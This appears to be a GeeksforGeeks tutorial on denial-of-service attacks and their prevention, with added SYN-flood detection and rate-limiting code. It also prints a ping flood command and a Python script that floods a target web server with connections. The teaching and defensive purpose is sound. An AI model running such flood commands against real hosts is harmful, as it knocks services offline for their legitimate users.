Denial of Service and Prevention - GeeksforGeeks

Akash Sharan.

Denial of Service and Prevention

  • Difficulty Level : Medium
  • Last Updated : 02 Nov, 2021

Denial of Service (DoS) is a cyber-attack on an individual computer or website with the intent to deny service to its intended users. Its purpose is to disrupt an organization’s network operations by denying access to its users. Denial of service is typically accomplished by flooding the targeted machine or resource with surplus requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
For example, if a bank website can handle 10 people per second clicking the Login button, an attacker only has to send 10 fake requests per second to ensure that no legitimate user can log in.

DoS attacks exploit various weaknesses in computer network technologies. They may target servers, network routers, or network communication links. They can cause computers and routers to crash and links to bog down.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them. In the early days of the Web, this attack could cause unprotected Internet servers to crash quickly.

It is strongly recommended to try all described activities on virtual machines rather than in your working environment.

The following command (Windows ping syntax) floods an IP address with ping requests:

ping ip_address -t -l 65500

Here,

  • “ping” sends the data packets to the victim.
  • “ip_address” is the IP address of the victim.
  • “-t” means the data packets should be sent until the program is stopped.
  • “-l 65500” specifies the size of the data payload, in bytes, sent with each packet.

Other basic types of DoS attacks involve:

  • Flooding a network with useless activity so that genuine traffic cannot get through. The TCP/IP SYN flood and smurf attacks are two common examples.
  • Remotely overloading a system’s CPU so that valid requests cannot be processed.
  • Changing permissions or breaking authorization logic to prevent users from logging into a system. One common example involves triggering a rapid series of false login attempts that lock accounts out so their owners can no longer log in.
  • Deleting or interfering with specific critical applications or services to prevent their normal operation (even if the system and network overall are functional).
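A SYN flood, the first item in the list above, leaves a tell-tale pattern in connection logs: one source opens far more connections than it completes. The script below is an added detection example, not part of the original article, and it assumes a simple constructed log format of one event per line, "<ISO timestamp> <SYN|ACK> <src_ip> -> <dst_ip>:<port>", where ACK marks the completion of the three-way handshake. It flags any source that sends more than a threshold of SYNs within a sliding window while completing only a small fraction of them.

```python
"""Flag likely TCP SYN-flood sources from connection-event logs.

Added example (not part of the original article). The log format is an
assumed, constructed one: "<ISO timestamp> <FLAG> <src_ip> -> <dst_ip>:<port>",
with FLAG = SYN for a connection request and ACK for handshake completion.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_log():
    """Build a constructed sample: one normal client that completes every
    handshake, and one source that sends many SYNs and never completes any."""
    base = datetime(2021, 11, 2, 10, 0, 0)
    lines = []
    # Legitimate client: 8 connections over 8 seconds, each SYN followed by an ACK.
    for i in range(8):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} SYN 198.51.100.20 -> 198.51.100.10:80")
        lines.append(f"{(t + timedelta(milliseconds=50)).isoformat()} ACK 198.51.100.20 -> 198.51.100.10:80")
    # Suspicious source: 120 SYNs in about 4 seconds, no handshake completions.
    for i in range(120):
        t = base + timedelta(milliseconds=33 * i)
        lines.append(f"{t.isoformat()} SYN 203.0.113.5 -> 198.51.100.10:80")
    return lines


def parse_line(line):
    """Split one log line into (timestamp, flag, src_ip, dst)."""
    ts, flag, src, _arrow, dst = line.split()
    return datetime.fromisoformat(ts), flag, src, dst


def syn_flood_sources(lines, window=timedelta(seconds=10),
                      syn_threshold=50, max_completion_ratio=0.2):
    """Return {src_ip: (total_syns, total_acks)} for every source that sends at
    least syn_threshold SYNs inside some window of length `window` and completes
    fewer than max_completion_ratio of its handshakes."""
    events = sorted(parse_line(line) for line in lines)
    syn_times = defaultdict(list)
    ack_count = defaultdict(int)
    for ts, flag, src, _dst in events:
        if flag == "SYN":
            syn_times[src].append(ts)
        elif flag == "ACK":
            ack_count[src] += 1

    flagged = {}
    for src, times in syn_times.items():
        # Sliding window over the (already sorted) SYN timestamps: track the
        # largest number of SYNs that fall inside any window-length span.
        start = 0
        peak = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        completion = ack_count[src] / len(times)
        if peak >= syn_threshold and completion < max_completion_ratio:
            flagged[src] = (len(times), ack_count[src])
    return flagged


if __name__ == "__main__":
    for src, (syns, acks) in syn_flood_sources(constructed_log()).items():
        print(f"possible SYN flood from {src}: {syns} SYNs, {acks} completed")
```

The completion ratio matters as much as the raw count: a busy but legitimate client (a proxy, a crawler) also opens many connections, but it finishes its handshakes, so it is not flagged. The thresholds are assumptions and should be tuned to the normal traffic of the server being protected.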

Another variant of DoS is the Smurf attack. This involves emails with automatic responses. If someone sends hundreds of email messages with a fake return address to hundreds of people in an organization who have an autoresponder enabled, the initial messages can turn into thousands of replies sent to the fake address. If that fake email address actually belongs to someone, this can overwhelm that person’s account.

DoS attacks can cause the following problems:

  • Ineffective services
  • Inaccessible services
  • Interruption of network traffic
  • Connection interference

The following Python script performs a denial of service attack against a small website that did not expect so many socket connections:

# Please note that running this code might
# cause your IP to be blocked by the server. The purpose
# of this code is only learning.
# (Python 2 syntax, as in the original article.)
import socket, sys, os

# sys.argv[1] is the target host, sys.argv[2] the path to request
print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2]

def attack():
    #pid = os.fork()
    # Open a TCP connection to port 80, send a single GET, then close
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 80))
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
    s.send("Host: " + sys.argv[1] + "\r\n\r\n")
    s.close()

# Driver code: repeat the request 999 times
for i in range(1, 1000):
    attack()

The above code is run as:

python ddos.py target_ip_address apache

Prevention

Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.

  • Cloud Mitigation Provider – Cloud mitigation providers are experts at providing DDoS mitigation from the cloud. This means they have built out massive amounts of network bandwidth and DDoS mitigation capacity at multiple sites around the Internet that can take in any type of network traffic, whether you use multiple ISPs, your own data center, or any number of cloud providers. They can scrub the traffic for you and only send “clean” traffic to your data center.
  • Firewall – This is the simplest and least effective method. Generally, someone writes some Python scripts that try to filter out the bad traffic, or an enterprise will try to use its existing firewalls to block the traffic.
  • Internet Service Provider (ISP) – Some enterprises use their ISP to provide DDoS mitigation. These ISPs have more bandwidth than an enterprise would, which can help with large volumetric attacks.

To safeguard against these attacks you have to apply secure coding practices, design a strong architecture that can withstand these kinds of attacks, and keep your website patched against bugs as they are discovered.
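One concrete piece of the "secure coding and strong architecture" advice above is per-client rate limiting in the application or at a reverse proxy, so that a single source repeating requests in a tight loop (like the article's script) cannot consume the server's whole capacity. The code below is an added example, not part of the original article or of any product: a token-bucket limiter keyed by source IP, run over a constructed request stream containing one normal client and one flooder. Times are integer milliseconds and tokens are counted in thousandths so the arithmetic is exact and the result is reproducible.

```python
"""Per-client token-bucket rate limiting as an application-level DoS control.

Added example (not part of the original article). Times are integer
milliseconds and tokens are tracked in thousandths (millitokens) so the
simulation is exact.
"""
from collections import defaultdict


class TokenBucket:
    """Allow up to `burst` requests at once, then refill at `rate` requests/second."""

    def __init__(self, rate_per_second, burst):
        self.rate = rate_per_second
        self.capacity = burst * 1000   # millitokens
        self.tokens = self.capacity    # bucket starts full
        self.last_ms = None

    def allow(self, now_ms):
        """Refill for the elapsed time, then try to spend one token (1000 millitokens)."""
        if self.last_ms is not None:
            elapsed = now_ms - self.last_ms
            # `rate` tokens per second is `rate` millitokens per millisecond.
            self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        self.last_ms = now_ms
        if self.tokens >= 1000:
            self.tokens -= 1000
            return True
        return False


class PerClientLimiter:
    """One independent bucket per client key (here the source IP)."""

    def __init__(self, rate_per_second, burst):
        self.buckets = defaultdict(lambda: TokenBucket(rate_per_second, burst))

    def allow(self, client_ip, now_ms):
        return self.buckets[client_ip].allow(now_ms)


def constructed_requests():
    """Constructed traffic: a normal client at 1 request/second and a flooder at
    50 requests/second, both for 20 seconds. The flooder sends 1000 requests,
    the same count as the loop in the article's script."""
    reqs = [(1000 * i, "192.0.2.10") for i in range(20)]
    reqs += [(20 * i, "203.0.113.5") for i in range(1000)]
    return sorted(reqs)


def simulate(requests, rate_per_second=5, burst=10):
    """Run a (time_ms, client_ip) stream through the limiter and return
    {client_ip: (allowed, dropped)}."""
    limiter = PerClientLimiter(rate_per_second, burst)
    stats = defaultdict(lambda: [0, 0])
    for now_ms, ip in requests:
        if limiter.allow(ip, now_ms):
            stats[ip][0] += 1
        else:
            stats[ip][1] += 1
    return {ip: tuple(counts) for ip, counts in stats.items()}


if __name__ == "__main__":
    for ip, (allowed, dropped) in simulate(constructed_requests()).items():
        print(f"{ip}: allowed={allowed} dropped={dropped}")
```

With a sustained rate of 5 requests/second and a burst of 10, the normal client is never throttled, while the flooder gets its first 11 requests through and then only one in every ten, so the server's work for that source drops to roughly the configured rate regardless of how fast it sends. Keying on the source IP is the simplest choice; behind a shared NAT or a CDN the key should be whatever identifies the real client (for example the authenticated user or a forwarded-for header that the proxy is trusted to set), otherwise one abuser can exhaust the budget of everyone behind the same address.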
